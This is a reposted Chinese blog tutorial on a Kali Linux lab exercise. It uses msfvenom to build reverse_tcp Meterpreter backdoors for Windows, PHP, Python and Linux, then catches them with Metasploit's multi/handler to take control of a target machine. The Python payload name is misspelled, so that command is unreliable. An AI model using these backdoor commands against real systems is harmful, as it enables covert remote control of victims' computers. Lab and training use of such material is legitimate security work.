Kali Linux渗透测试小实践——Metasploit与后门木马

这篇具有很好参考价值的文章主要介绍了Kali Linux渗透测试小实践——Metasploit与后门木马。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一、环境和工具准备

1.Metasploit

2.Kali Linux与靶机

二、实践过程

1.打开Kali Linux,进入终端

2.输入生成木马的命令,并配置相关参数


一、环境和工具准备

1.Metasploit

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

kali生成图片木马,渗透测试与安全攻防,渗透测试,web安全,网络安全,木马,MSF

2.Kali Linux与靶机

在一个实用的工具包里尽可能多的包含渗透和审计工具。Kali 实现了这个目标。大多数做安全测试的开源工具都被囊括在内。

二、实践过程

1.打开Kali Linux,进入终端

输入msfconsole

kali生成图片木马,渗透测试与安全攻防,渗透测试,web安全,网络安全,木马,MSF

 进入之后的画面

kali生成图片木马,渗透测试与安全攻防,渗透测试,web安全,网络安全,木马,MSF​ 

2.输入生成木马的命令,并配置相关参数

这里针对windows系统,就用关于windows的木马生成命令:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=kali的IP地址 lport=端口 -f exe -o 文件名.exe

其他相关系统的木马生成命令如下:

1.PHP后门
msfvenom -p php/meterpreter/reverse_tcp LHOST=kali的IP LPORT=端口 -f raw -o 文件名.php

2.Python后门
msfvenom -p python/meterpreter/reverser_tcp LHOST=kali的IP地址 LPORT=端口 -f  raw > shell.py

3.Linux后门
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=kali的IP地址 LPORT=端口 -f elf > shell.elf

在命令行里输入命令,注意,这里的lhost是kali的IP地址,lport是靶机的开启的端口,生成成功后下面命令行会有提示

 生成之后,可以在系统的主目录中找到,然后复制到靶机上

kali生成图片木马,渗透测试与安全攻防,渗透测试,web安全,网络安全,木马,MSF

 然后单独进入Metasploit,使用exploit/multi/handler模块设置攻击载荷,设置完成之后run,进行攻击

use exploit/multi/handler

kali生成图片木马,渗透测试与安全攻防,渗透测试,web安全,网络安全,木马,MSF

这个时候点击靶机上的木马文件,点击之后,会自动连接上线,Metasploit就会显示meterpreter,这时候可以使用其他命令进行操作,可以使用screenshot截取当前屏幕状态,图片在kali主目录中

kali生成图片木马,渗透测试与安全攻防,渗透测试,web安全,网络安全,木马,MSF文章来源地址https://www.toymoban.com/news/detail-647557.html

到了这里,关于Kali Linux渗透测试小实践——Metasploit与后门木马的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

原文地址:https://blog.csdn.net/qq_60503432/article/details/128590864

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包